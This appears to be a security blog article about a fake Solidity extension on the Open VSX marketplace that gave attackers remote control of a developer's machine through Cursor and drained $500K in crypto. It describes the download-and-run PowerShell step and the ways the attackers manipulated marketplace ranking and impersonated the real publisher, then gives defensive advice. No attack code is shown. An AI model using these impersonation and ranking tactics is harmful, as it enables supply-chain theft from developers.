$500K Crypto Hack: The Danger of VS Code Extensions & AI Code Editors

The Incident

In June 2025, a seasoned blockchain developer experienced a nightmare. After a clean install of his computer and setting up his development environment from scratch, he started coding in Cursor, an AI-based editor and a fork of VS Code. A few days later, when he checked one of his crypto wallets, he discovered that half a million dollars worth of cryptocurrency had vanished without his knowledge.

The Investigation

The developer, being careful and experienced, couldn't figure out how this happened. His computer had a fresh Windows install, he hadn't visited any sketchy websites or downloaded cracked software. He reached out to a cyber security company, Casperski. They found a small piece of malicious code executing inside his Cursor IDE. The code was in a file called extension.js in the user's profile directory. It reached out to a server called angelic.su, downloaded a PowerShell script, and executed it, giving the attackers full access to his machine.

The Malicious Extension

The malicious code was part of the Solidity language extension, which the developer had downloaded from the Cursor extension marketplace. When the researchers opened the extension.js file, they found that it wasn't providing any language support as promised. Instead, it ran every time the extension loaded, silently downloading and executing the script from the remote server. The PowerShell script first checked for Screen Connect, a legitimate remote access software. If not installed, it downloaded and installed a version configured to talk to the attacker's servers, giving them complete control over the developer's machine.

How the Malicious Extension Got Through

The attacker copied the description of the legitimate Solidity extension and published a fake one in the Cursor extension marketplace. When the developer searched for Solidity, the malicious extension showed up fourth in the search results, while the legitimate one was eighth. Cursor uses an extension marketplace called Open VSX, which uses a relevance algorithm that looks at factors like download count, last update date, rating, and verification. The attackers gamed the system by updating the fake extension two weeks after the legitimate one, boosting its ranking. The malicious extension also had a significant number of downloads (54,000), making it seem legitimate.

The Aftermath

The malicious extension was caught, reported, and removed from the marketplace on July 2nd. But the attackers came back the next day with a new extension, using the same name as the legitimate one and inflating the download count to 2 million. They also used a similar developer name with a capital I instead of a lowercase L, making it difficult to distinguish.

The Role of Open VSX

Cursor, being a fork of VS Code, cannot use the official Microsoft Visual Studio marketplace. Instead, it uses Open VSX, a community-run alternative. Microsoft's marketplace has teams of people reviewing extensions, automated security scanning, and strict policies. In contrast, Open VSX is run by the Eclipse Foundation with a smaller team and a more open philosophy, which makes it easier for attackers to publish fake extensions.

The Nature of IDE Extensions

IDE extensions need system-level access to be useful. They can read, write, create, and delete files, run commands, and access the internet. This power makes them dangerous. Unlike browser extensions, which run in a sandbox and require specific permissions, IDE extensions have complete access to the computer.

The Gap Between Source Code and Installed Extensions

Even if an extension is open source and its code is published on GitHub, what you install on your computer is a compiled, packaged version. The build process allows developers to add malicious code during packaging, even if the source code is clean. This has happened with various types of software, including VS Code extensions, npm packages, and Python libraries.

Protecting Yourself

• Install VS Code alongside your preferred fork. Install new extensions in VS Code from the Microsoft marketplace, test them, and then migrate them to your fork.

• If an extension doesn't work as promised, uninstall it immediately.

• Check the publisher of the extension. Look at their profile, how long they've been publishing extensions, and what else they've made.

• Be cautious with new extensions. Wait for others to try them out and for problems to surface.

• Compartmentalize your work. Install only the extensions you absolutely need, especially when working on sensitive projects. Separate your work and personal stuff.

Conclusion

The software ecosystem is evolving, and with it comes new security challenges. We need to change how we think about trust in software. While most extensions are useful and developers are honest, attackers are becoming more sophisticated. By staying informed, being cautious, and taking practical steps to protect ourselves, we can continue to build great things while minimizing the risk of falling victim to malicious extensions.